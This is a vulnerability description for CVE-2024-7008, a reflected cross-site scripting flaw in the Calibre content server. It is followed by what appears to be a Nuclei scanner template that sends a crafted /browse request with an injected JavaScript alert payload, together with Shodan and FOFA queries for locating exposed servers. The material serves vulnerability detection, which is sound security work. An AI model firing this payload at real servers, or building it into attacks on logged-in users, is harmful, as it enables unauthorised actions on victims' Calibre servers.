It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
PoC代码[已公开]
id: CVE-2024-7008
info:
name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
author: DhiyaneshDK
severity: medium
description: |
It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
reference:
- https://starlabs.sg/advisories/24/24-7008/
classification:
epss-score: 0.09449
epss-percentile: 0.92526
metadata:
verified: true
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 1
tags: cve,cve2024,calibre,xss
http:
- raw:
- |
GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'
- type: status
status:
- 200
# digest: 4a0a004730450220784840aae41d1e8d307815a743edd222e63bf0d198df938fa91c50fc54248034022100e6656a373a75737c6cc1d4cd389988d3e49aa017304cf654af381f6ebd00382b:922c64590222798bb761d5b6d8e72950